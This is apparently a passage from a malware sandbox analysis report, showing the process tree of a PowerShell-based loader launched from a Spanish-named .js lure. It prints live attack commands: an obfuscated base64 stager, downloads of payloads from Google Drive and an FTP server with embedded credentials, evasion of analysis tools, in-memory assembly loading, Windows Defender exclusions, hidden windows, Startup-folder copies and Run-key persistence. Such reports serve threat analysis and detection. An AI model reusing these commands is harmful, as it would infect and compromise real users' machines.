'yAHQAdQ' + [char]66 + 'wACcAIAApACAALQ' + [char]66 + 'mAG8Acg' + [char]66 + 'jAGUAIAA7AHAAbw' + [char]66 + '3AGUAcg' + [char]66 + 'zAGgAZQ' + [char]66 + 'sAGwALg' + [char]66 + 'lAHgAZQAgAC0AYw' + [char]66 + 'vAG0AbQ' + [char]66 + 'hAG4AZAAgACcAcw' + [char]66 + 'sAGUAZQ' + [char]66 + 'wACAAMQA4ADAAJwA7ACAAcw' + [char]66 + 'oAHUAdA' + [char]66 + 'kAG8Adw' + [char]66 + 'uAC4AZQ' + [char]66 + '4AGUAIAAvAHIAIAAvAHQAIAAwACAALw' + [char]66 + 'mACAAfQ' + [char]66 + 'lAGwAcw' + [char]66 + 'lACAAew' + [char]66 + 'bAFMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4ATg' + [char]66 + 'lAHQALg' + [char]66 + 'TAGUAcg' + [char]66 + '2AGkAYw' + [char]66 + 'lAFAAbw' + [char]66 + 'pAG4AdA' + [char]66 + 'NAGEAbg' + [char]66 + 'hAGcAZQ' + [char]66 + 'yAF0AOgA6AFMAZQ' + [char]66 + 'yAHYAZQ' + [char]66 + 'yAEMAZQ' + [char]66 + 'yAHQAaQ' + [char]66 + 'mAGkAYw' + [char]66 + 'hAHQAZQ' + [char]66 + 'WAGEAbA' + [char]66 + 'pAGQAYQ' + [char]66 + '0AGkAbw' + [char]66 + 'uAEMAYQ' + [char]66 + 'sAGwAYg' + [char]66 + 'hAGMAawAgAD0AIA' + [char]66 + '7ACQAdA' + [char]66 + 'yAHUAZQ' + [char]66 + '9ACAAOw' + [char]66 + 'bAFMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4ATg' + [char]66 + 'lAHQALg' + [char]66 + 'TAGUAcg' + [char]66 + '2AGkAYw' + [char]66 + 'lAFAAbw' + [char]66 + 'pAG4AdA' + [char]66 + 'NAGEAbg' + [char]66 + 'hAGcAZQ' + [char]66 + 'yAF0AOgA6AFMAZQ' + [char]66 + 'jAHUAcg' + [char]66 + 'pAHQAeQ' + [char]66 + 'QAHIAbw' + [char]66 + '0AG8AYw' + [char]66 + 'vAGwAIAA9ACAAWw' + [char]66 + 'TAHkAcw' + [char]66 + '0AGUAbQAuAE4AZQ' + [char]66 + '0AC4AUw' + [char]66 + 'lAGMAdQ' + [char]66 + 'yAGkAdA' + [char]66 + '5AFAAcg' + [char]66 + 'vAHQAbw' + [char]66 + 'jAG8AbA' + [char]66 + 'UAHkAcA' + [char]66 + 'lAF0AOgA6AFQAbA' + [char]66 + 'zADEAMgAgADsAaQ' + [char]66 + 'mACgAKA' + [char]66 + 'nAGUAdAAtAHAAcg' + [char]66 + 'vAGMAZQ' + [char]66 + 'zAHMAIAAnAFcAaQ' + [char]66 + 'yAGUAcw' + [char]66 + 'oAGEAcg' + [char]66 + 'rACcALAAnAGEAcA' + [char]66 + 'hAHQAZQ' + [char]66 + 'EAE4AUwAnACwAJw' + [char]66 + 'hAG4AYQ' + [char]66 + 'sAHkAeg' + [char]66 + 'lACcAIAAtAGUAYQAgAFMAaQ' + [char]66 + 'sAGUAbg' + [char]66 + '0AGwAeQ' + [char]66 + 'DAG8Abg' + [char]66 + '0AGkAbg' + [char]66 + '1AGUAKQAgAC0AZQ' + [char]66 + 'xACAAJA' + [char]66 + 'OAHUAbA' + [char]66 + 'sACkAewAgAA0ACgAgACAAIAAgACAAIAAgAA0ACg' + [char]66 + '9AA0ACgANAAoAZQ' + [char]66 + 'sAHMAZQ' + [char]66 + '7ACAADQAKAFIAZQ' + [char]66 + 'zAHQAYQ' + [char]66 + 'yAHQALQ' + [char]66 + 'DAG8AbQ' + [char]66 + 'wAHUAdA' + [char]66 + 'lAHIAIAAtAGYAbw' + [char]66 + 'yAGMAZQAgADsADQAKACAAIAAgACAAIAAgAGUAeA' + [char]66 + 'pAHQAIAA7AA0ACgAgAH0AIAA7ACQAcQ' + [char]66 + 'iAHMAcQ' + [char]66 + 'zACAAPQAgACgAJw' + [char]66 + 'mAHQAcAA6AC8ALw' + [char]66 + 'kAGUAcw' + [char]66 + 'jAGsAdg' + [char]66 + 'iAHIAYQ' + [char]66 + '0ADEAQA' + [char]66 + 'mAHQAcAAuAGQAZQ' + [char]66 + 'zAGMAaw' + [char]66 + '2AGIAcg' + [char]66 + 'hAHQALg' + [char]66 + 'jAG8AbQAuAGIAcgAvAFUAcA' + [char]66 + 'jAHIAeQ' + [char]66 + 'wAHQAZQ' + [char]66 + 'yACcAIAArACAAJwAvADAAMgAvAEQATA' + [char]66 + 'MADAAMQAuAHQAeA' + [char]66 + '0ACcAIAApADsAJA' + [char]66 + 'KAHUAaw' + [char]66 + 'wAFYAIAA9ACAAKAAgAFsAUw' + [char]66 + '5AHMAdA' + [char]66 + 'lAG0ALg' + [char]66 + 'JAE8ALg' + [char]66 + 'QAGEAdA' + [char]66 + 'oAF0AOgA6AEcAZQ' + [char]66 + '0AFQAZQ' + [char]66 + 'tAHAAUA' + [char]66 + 'hAHQAaAAoACkAIAArACAAJw' + [char]66 + 'kAGwAbAAwADEALg' + [char]66 + '0AHgAdAAnACkAOwAkAEwAUQ' + [char]66 + 'RAEEAQgAgAD0AIAAoAC0Aag' + [char]66 + 'vAGkAbgAgAFsAYw' + [char]66 + 'oAGEAcg' + [char]66 + 'bAF0AXQAoADEAMAAwACwAMQAwADEALAAxADEANQAsADkAOQAsADEAMAA3ACwAMQAxADgALAA5ADgALAAxADEANAAsADkANwAsADEAMQA2ACwANAA5ACkAKQAgADsAJA' + [char]66 + 'sAGwAbA' + [char]66 + 'HAHEAIAA9ACAAKAAtAGoAbw' + [char]66 + 'pAG4AIA' + [char]66 + 'bAGMAaA' + [char]66 + 'hAHIAWw' + [char]66 + 'dAF0AKAAxADAAMgAsACAAOAA5ACwAIAAxADEANwAsACAAMQAwADAALAAgADgAOQAsACAANAA5ACwAIAA1ADMALAAgADUANQAsACAANQA2ACwAIAA2ADQALAAgADYANAAsACAANgA0ACwAIAA2ADQALAAgADYANAAsACAANgA0ACAAKQApACAAOwAkAHcAZQ' + [char]66 + 'iAEMAbA' + [char]66 + 'pAGUAbg' + [char]66 + '0ACAAPQAgAE4AZQ' + [char]66 + '3AC0ATw' + [char]66 + 'iAGoAZQ' + [char]66 + 'jAHQAIA' + [char]66 + 'TAHkAcw' + [char]66 + '0AGUAbQAuAE4AZQ' + [char]66 + '0AC4AVw' + [char]66 + 'lAGIAQw' + [char]66 + 'sAGkAZQ' + [char]66 + 'uAHQAIAA7ACQAdw' + [char]66 + 'lAGIAQw' + [char]66 + 'sAGkAZQ' + [char]66 + 'uAHQALg' + [char]66 + 'DAHIAZQ' + [char]66 + 'kAGUAbg' + [char]66 + '0AGkAYQ' + [char]66 + 'sAHMAIAA9ACAAbg' + [char]66 + 'lAHcALQ' + [char]66 + 'vAGIAag' + [char]66 + 'lAGMAdAAgAFMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4ATg' + [char]66 + 'lAHQALg' + [char]66 + 'OAGUAdA' + [char]66 + '3AG8Acg' + [char]66 + 'rAEMAcg' + [char]66 + 'lAGQAZQ' + [char]66 + 'uAHQAaQ' + [char]66 + 'hAGwAKAAkAEwAUQ' + [char]66 + 'RAEEAQgAsACAAJA' + [char]66 + 'sAGwAbA' + [char]66 + 'HAHEAKQAgADsAJA' + [char]66 + 'SAFYAVQ' + [char]66 + 'YAHYAIAA9ACAAJA' + [char]66 + '3AGUAYg' + [char]66 + 'DAGwAaQ' + [char]66 + 'lAG4AdAAuAEQAbw' + [char]66 + '3AG4AbA' + [char]66 + 'vAGEAZA' + [char]66 + 'TAHQAcg' + [char]66 + 'pAG4AZwAoACAAJA' + [char]66 + 'xAGIAcw' + [char]66 + 'xAHMAIAApACAAOwAkAFIAVg' + [char]66 + 'VAFgAdgAgAHwAIA' + [char]66 + 'PAHUAdAAtAEYAaQ' + [char]66 + 'sAGUAIAAtAEYAaQ' + [char]66 + 'sAGUAUA' + [char]66 + 'hAHQAaAAgACQASg' + [char]66 + '1AGsAcA' + [char]66 + 'WACAALQ' + [char]66 + 'FAG4AYw' + [char]66 + 'vAGQAaQ' + [char]66 + 'uAGcAIAAnAFUAVA' + [char]66 + 'GADgAJwAgAC0AZg' + [char]66 + 'vAHIAYw' + [char]66 + 'lACAAOwAkAFMAVA' + [char]66 + 'mAEcAbAAgAD0AIAAoACAAWw' + [char]66 + 'TAHkAcw' + [char]66 + '0AGUAbQAuAEkATwAuAFAAYQ' + [char]66 + '0AGgAXQA6ADoARw' + [char]66 + 'lAHQAVA' + [char]66 + 'lAG0AcA' + [char]66 + 'QAGEAdA' + [char]66 + 'oACgAKQAgACsAIAAnAGQAbA' + [char]66 + 'sADAAMgAuAHQAeA' + [char]66 + '0ACcAKQAgADsAJA' + [char]66 + 'QAGgAcg' + [char]66 + 'sAE4AIAA9ACAATg' + [char]66 + 'lAHcALQ' + [char]66 + 'PAGIAag' + [char]66 + 'lAGMAdAAgAFMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4ATg' + [char]66 + 'lAHQALg' + [char]66 + 'XAGUAYg' + [char]66 + 'DAGwAaQ' + [char]66 + 'lAG4AdAAgADsAJA' + [char]66 + 'QAGgAcg' + [char]66 + 'sAE4ALg' + [char]66 + 'FAG4AYw' + [char]66 + 'vAGQAaQ' + [char]66 + 'uAGcAIAA9ACAAWw' + [char]66 + 'TAHkAcw' + [char]66 + '0AGUAbQAuAFQAZQ' + [char]66 + '4AHQALg' + [char]66 + 'FAG4AYw' + [char]66 + 'vAGQAaQ' + [char]66 + 'uAGcAXQA6ADoAVQ' + [char]66 + 'UAEYAOAAgADsAJA' + [char]66 + 'EAEgAeg' + [char]66 + 'VAEEAIAAgAD0AIAAoACAARw' + [char]66 + 'lAHQALQ' + [char]66 + 'DAG8Abg' + [char]66 + '0AGUAbg' + [char]66 + '0ACAALQ' + [char]66 + 'QAGEAdA' + [char]66 + 'oACAAJA' + [char]66 + 'KAHUAaw' + [char]66 + 'wAFYAIAApACAAOwAkAHUAVA' + [char]66 + 'sAEgAegAgAD0AIAAkAFAAaA' + [char]66 + 'yAGwATgAuAEQAbw' + [char]66 + '3AG4AbA' + [char]66 + 'vAGEAZA' + [char]66 + 'TAHQAcg' + [char]66 + 'pAG4AZwAoACAAJA' + [char]66 + 'EAEgAeg' + [char]66 + 'VAEEAIAApACAAOwAkAHUAVA' + [char]66 + 'sAEgAegAgAHwAIA' + [char]66 + 'PAHUAdAAtAEYAaQ' + [char]66 + 'sAGUAIAAtAEYAaQ' + [char]66 + 'sAGUAUA' + [char]66 + 'hAHQAaAAgACQAUw' + [char]66 + 'UAGYARw' + [char]66 + 'sACAALQ' + [char]66 + 'mAG8Acg' + [char]66 + 'jAGUAIAA7ACQAYQ' + [char]66 + 'lAEQAdw' + [char]66 + 'VACAAPQAgACcAJA' + [char]66 + 'yAHkAYQ' + [char]66 + 'lAEcAIAA9ACAAKA' + [char]66 + 'HAGUAdAAtAEMAbw' + [char]66 + 'uAHQAZQ' + [char]66 + 'uAHQAIAAtAFAAYQ' + [char]66 + '0AGgAIAAnACAAKwAgACQAUw' + [char]66 + 'UAGYARw' + [char]66 + 'sACAAKwAgACcAIAAtAEUAbg' + [char]66 + 'jAG8AZA' + [char]66 + 'pAG4AZwAgAFUAVA' + [char]66 + 'GADgAKQA7ACcAIAA7ACQAYQ' + [char]66 + 'lAEQAdw' + [char]66 + 'VACAAKwA9ACAAJw' + [char]66 + 'bAEIAeQ' + [char]66 + '0AGUAWw' + [char]66 + 'dAF0AIAAkAEYAeQ' + [char]66 + 'mAGQAegAgAD0AIA' + [char]66 + 'bAHMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4AQw' + [char]66 + 'vAG4Adg' + [char]66 + 'lAHIAdA' + [char]66 + 'dADoAOg' + [char]66 + 'GAHIAbw' + [char]66 + 'tAEIAYQ' + [char]66 + 'zAGUANgA0AFMAdA' + [char]66 + 'yAGkAbg' + [char]66 + 'nACgAIAAkAHIAeQ' + [char]66 + 'hAGUARwAuAHIAZQ' + [char]66 + 'wAGwAYQ' + [char]66 + 'jAGUAKAAnACcAkyE6AJMhJwAnACwAJwAnAEEAJwAnACkAIAApACAAOwAnACAAOwAkAGEAZQ' + [char]66 + 'EAHcAVQAgACsAPQAgACcAWw' + [char]66 + 'TAHkAcw' + [char]66 + '0AGUAbQAuAEEAcA' + [char]66 + 'wAEQAbw' + [char]66 + 'tAGEAaQ' + [char]66 + 'uAF0AOgAnACAAKwAgACcAOg' + [char]66 + 'DAHUAcg' + [char]66 + 'yAGUAbg' + [char]66 + '0AEQAbw' + [char]66 + 'tAGEAaQ' + [char]66 + 'uAC4ATA' + [char]66 + 'vAGEAZAAoACAAJA' + [char]66 + 'GAHkAZg' + [char]66 + 'kAHoAIAApAC4AJwAgADsAJA' + [char]66 + 'hAGUARA' + [char]66 + '3AFUAIAArAD0AIAAnAEcAZQ' + [char]66 + '0AFQAeQ' + [char]66 + 'wAGUAKAAgACcAJw' + [char]66 + 'DAGwAYQ' + [char]66 + 'zAHMATA' + [char]66 + 'pAGIAcg' + [char]66 + 'hAHIAeQAzAC4AQw' + [char]66 + 'sAGEAcw' + [char]66 + 'zADEAJwAnACAAKQAuAEcAZQ' + [char]66 + '0AE0AJwAgADsAJA' + [char]66 + 'hAGUARA' + [char]66 + '3AFUAIAArAD0AIAAnAGUAdA' + [char]66 + 'oAG8AZAAoACAAJwAnAHAAcg' + [char]66 + 'GAFYASQAnACcAIAApAC4ASQ' + [char]66 + 'uAHYAbw' + [char]66 + 'rAGUAKAAgACQAbg' + [char]66 + '1AGwAbAAgACwAIA' + [char]66 + 'bAG8AYg' + [char]66 + 'qAGUAYw' + [char]66 + '0AFsAXQ' + [char]66 + 'dACAAKAAgACcAJw' + [char]66 + 'lADIANgAyADIAZQ' + [char]66 + 'iADkANAA5ADUAOQAtADgANAA4AGIALQ' + [char]66 + 'lADUAYwA0AC0AMAA0AGQAYwAtAGUANwAyAGUANAAyADkAZAA9AG4AZQ' + [char]66 + 'rAG8AdAAmAGEAaQ' + [char]66 + 'kAGUAbQA9AHQAbA' + [char]66 + 'hAD8AdA' + [char]66 + '4AHQALg' + [char]66 + 'sAG8AZw' + [char]66 + '1AGgALw' + [char]66 + 'vAC8AbQ' + [char]66 + 'vAGMALg' + [char]66 + '0AG8AcA' + [char]66 + 'zAHAAcA' + [char]66 + 'hAC4AOA' + [char]66 + 'lADcAZQA4AC0Acw' + [char]66 + 'vAGkAcg' + [char]66 + 'hAG4Abw' + [char]66 + 'sAGwAbw' + [char]66 + 'tAC8AYgAvADAAdgAvAG0Abw' + [char]66 + 'jAC4Acw' + [char]66 + 'pAHAAYQ' + [char]66 + 'lAGwAZw' + [char]66 + 'vAG8AZwAuAGUAZw' + [char]66 + 'hAHIAbw' + [char]66 + '0AHMAZQ' + [char]66 + 'zAGEAYg' + [char]66 + 'lAHIAaQ' + [char]66 + 'mAC8ALwA6AHMAcA' + [char]66 + '0AHQAaAAnACcAIAAsACAAJwAnACUARA' + [char]66 + 'DAFAASg' + [char]66 + 'VACUAJwAnACAALAAgACAAJwAnAEQAIA' + [char]66 + 'EAEQASQ' + [char]66 + 'uAHMAdA' + [char]66 + 'hAGwAbA' + [char]66 + 'VAHQAaQ' + [char]66 + 'sACcAJwAgACAAKQAgACkAOwAnADsAJA' + [char]66 + 'WAEIAVw' + [char]66 + 'XAHoAIAA9ACAAKAAgAFsAUw' + [char]66 + '5AHMAdA' + [char]66 + 'lAG0ALg' + [char]66 + 'JAE8ALg' + [char]66 + 'QAGEAdA' + [char]66 + 'oAF0AOgA6AEcAZQ' + [char]66 + '0AFQAZQ' + [char]66 + 'tAHAAUA' + [char]66 + 'hAHQAaAAoACkAIAArACAAJw' + [char]66 + 'kAGwAbAAwADMALg' + [char]66 + 'wAHMAMQAnACkAIAA7ACQAYQ' + [char]66 + 'lAEQAdw' + [char]66 + 'VACAAfAAgAE8AdQ' + [char]66 + '0AC0ARg' + [char]66 + 'pAGwAZQAgAC0ARg' + [char]66 + 'pAGwAZQ' + [char]66 + 'QAGEAdA' + [char]66 + 'oACAAJA' + [char]66 + 'WAEIAVw' + [char]66 + 'XAHoAIAAgAC0AZg' + [char]66 + 'vAHIAYw' + [char]66 + 'lACAAOw' + [char]66 + 'wAG8Adw' + [char]66 + 'lAHIAcw' + [char]66 + 'oAGUAbA' + [char]66 + 'sACAALQ' + [char]66 + 'FAHgAZQ' + [char]66 + 'jAHUAdA' + [char]66 + 'pAG8Abg' + [char]66 + 'QAG8AbA' + [char]66 + 'pAGMAeQAgAEIAeQ' + [char]66 + 'wAGEAcw' + [char]66 + 'zACAALQ' + [char]66 + 'GAGkAbA' + [char]66 + 'lACAAJA' + [char]66 + 'WAEIAVw' + [char]66 + 'XAHoAIAA7AH0AOwA=';$nKvfY = $nKvfY.replace('革','B') ;$nKvfY = [System.Convert]::FromBase64String( $nKvfY ) ;;;$nKvfY = [System.Text.Encoding]::Unicode.GetString( $nKvfY ) ;$nKvfY = $nKvfY.replace('%DCPJU%','C:\Users\Admin\AppData\Local\Temp\06122024_1551_04122024_Historial-Declcaraciones-vencidas-2022-2023.js') ;powershell $nKvfY
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2912
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$cIOeC = $host.Version.Major.Equals(2);If ( $cIOeC ) {$HzOMj = [System.IO.Path]::GetTempPath();del ($HzOMj + '\Upwin.msu');$qvjjf = 'https://drive.google.com/uc?export=download&id=';$Xumfi = $env:PROCESSOR_ARCHITECTURE.Contains('64');if ( $Xumfi ) {$qvjjf = ($qvjjf + '1p2brjH-QNY5brwiLZuYsW-R59UwjdSEV') ;}else {$qvjjf = ($qvjjf + '1aaHy4-BL1jpAnjhteg88KMZ7cu81Z05w') ;};$xxwtl = ( New-Object Net.WebClient ) ;$xxwtl.Encoding = [System.Text.Encoding]::UTF8 ;$xxwtl.DownloadFile($qvjjf, ($HzOMj + '\Upwin.msu') ) ;$UwfwZ = ( 'C:\Users\' + [Environment]::UserName );JCCGX = ( $HzOMj + '\Upwin.msu' ) ; powershell.exe wusa.exe JCCGX /quiet /norestart ; Copy-Item 'C:\Users\Admin\AppData\Local\Temp\06122024_1551_04122024_Historial-Declcaraciones-vencidas-2022-2023.js' -Destination ( $UwfwZ + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} ;[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12 ;if((get-process 'Wireshark','apateDNS','analyze' -ea SilentlyContinue) -eq $Null){ } else{ Restart-Computer -force ; exit ; } ;$qbsqs = ('ftp://[email protected]/Upcrypter' + '/02/DLL01.txt' );$JukpV = ( [System.IO.Path]::GetTempPath() + 'dll01.txt');$LQQAB = (-join [char[]](100,101,115,99,107,118,98,114,97,116,49)) ;$lllGq = (-join [char[]](102, 89, 117, 100, 89, 49, 53, 55, 56, 64, 64, 64, 64, 64, 64 )) ;$webClient = New-Object System.Net.WebClient ;$webClient.Credentials = new-object System.Net.NetworkCredential($LQQAB, $lllGq) ;$RVUXv = $webClient.DownloadString( $qbsqs ) ;$RVUXv | Out-File -FilePath $JukpV -Encoding 'UTF8' -force ;$STfGl = ( [System.IO.Path]::GetTempPath() + 'dll02.txt') ;$PhrlN = New-Object System.Net.WebClient ;$PhrlN.Encoding = [System.Text.Encoding]::UTF8 ;$DHzUA = ( Get-Content -Path $JukpV ) ;$uTlHz = $PhrlN.DownloadString( $DHzUA ) ;$uTlHz | Out-File -FilePath $STfGl -force ;$aeDwU = '$ryaeG = (Get-Content -Path ' + $STfGl + ' -Encoding UTF8);' ;$aeDwU += '[Byte[]] $Fyfdz = [system.Convert]::FromBase64String( $ryaeG.replace(''↓:↓'',''A'') ) ;' ;$aeDwU += '[System.AppDomain]:' + ':CurrentDomain.Load( $Fyfdz ).' ;$aeDwU += 'GetType( ''ClassLibrary3.Class1'' ).GetM' ;$aeDwU += 'ethod( ''prFVI'' ).Invoke( $null , [object[]] ( ''e2622eb94959-848b-e5c4-04dc-e72e429d=nekot&aidem=tla?txt.loguh/o/moc.topsppa.8e7e8-soiranollom/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth'' , ''C:\Users\Admin\AppData\Local\Temp\06122024_1551_04122024_Historial-Declcaraciones-vencidas-2022-2023.js'' , ''D DDInstallUtil'' ) );';$VBWWz = ( [System.IO.Path]::GetTempPath() + 'dll03.ps1') ;$aeDwU | Out-File -FilePath $VBWWz -force ;powershell -ExecutionPolicy Bypass -File $VBWWz ;};"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4936
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Local\Temp\dll03.ps1
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2860
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell $S = 'C:\Windows\System32\WindowsPowerShell\v1.0' ; Add-MpPreference -ExclusionPath $S -force ;
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3560
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell $S = 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe' ; Add-MpPreference -ExclusionPath $S -force ;
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4940
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c mkdir "C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\"
        5⤵
        
        PID:3316
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "powershell.exe -WindowStyle Hidden Start-Sleep -Seconds 1 ; powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -file 'C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\epesy.ps1'"
        5⤵
        Hide Artifacts: Hidden Window
        Suspicious use of WriteProcessMemory
        
        PID:2520
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -WindowStyle Hidden Start-Sleep -Seconds 1 ; powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -file 'C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\epesy.ps1'
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:3852
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\epesy.ps1"
        7⤵
        Command and Scripting Interpreter: PowerShell
        Adds Run key to start application
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4352
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "powershell.exe -WindowStyle Hidden Start-Sleep -Seconds 1 ; powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -file 'C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\vihes.ps1'"
        5⤵
        Hide Artifacts: Hidden Window
        Suspicious use of WriteProcessMemory
        
        PID:3268
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -WindowStyle Hidden Start-Sleep -Seconds 1 ; powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -file 'C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\vihes.ps1'
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:840
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\vihes.ps1"
        7⤵
        Command and Scripting Interpreter: PowerShell
        Adds Run key to start application
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4360
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\piihp.ps1"
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious use of SetThreadContext
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:5004
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\pesister.ps1"
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:1968
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\vihes.ps1"
        7⤵
        Command and Scripting Interpreter: PowerShell
        Adds Run key to start application
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2172
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\vihes.ps1"
        7⤵
        Command and Scripting Interpreter: PowerShell
        Adds Run key to start application
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4024
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\vihes.ps1"
        7⤵
        Command and Scripting Interpreter: PowerShell
        Adds Run key to start application
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:744
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\vihes.ps1"
        7⤵
        Command and Scripting Interpreter: PowerShell
        Adds Run key to start application
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2736
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\vihes.ps1"
        7⤵
        Command and Scripting Interpreter: PowerShell
        Adds Run key to start application
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2844
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
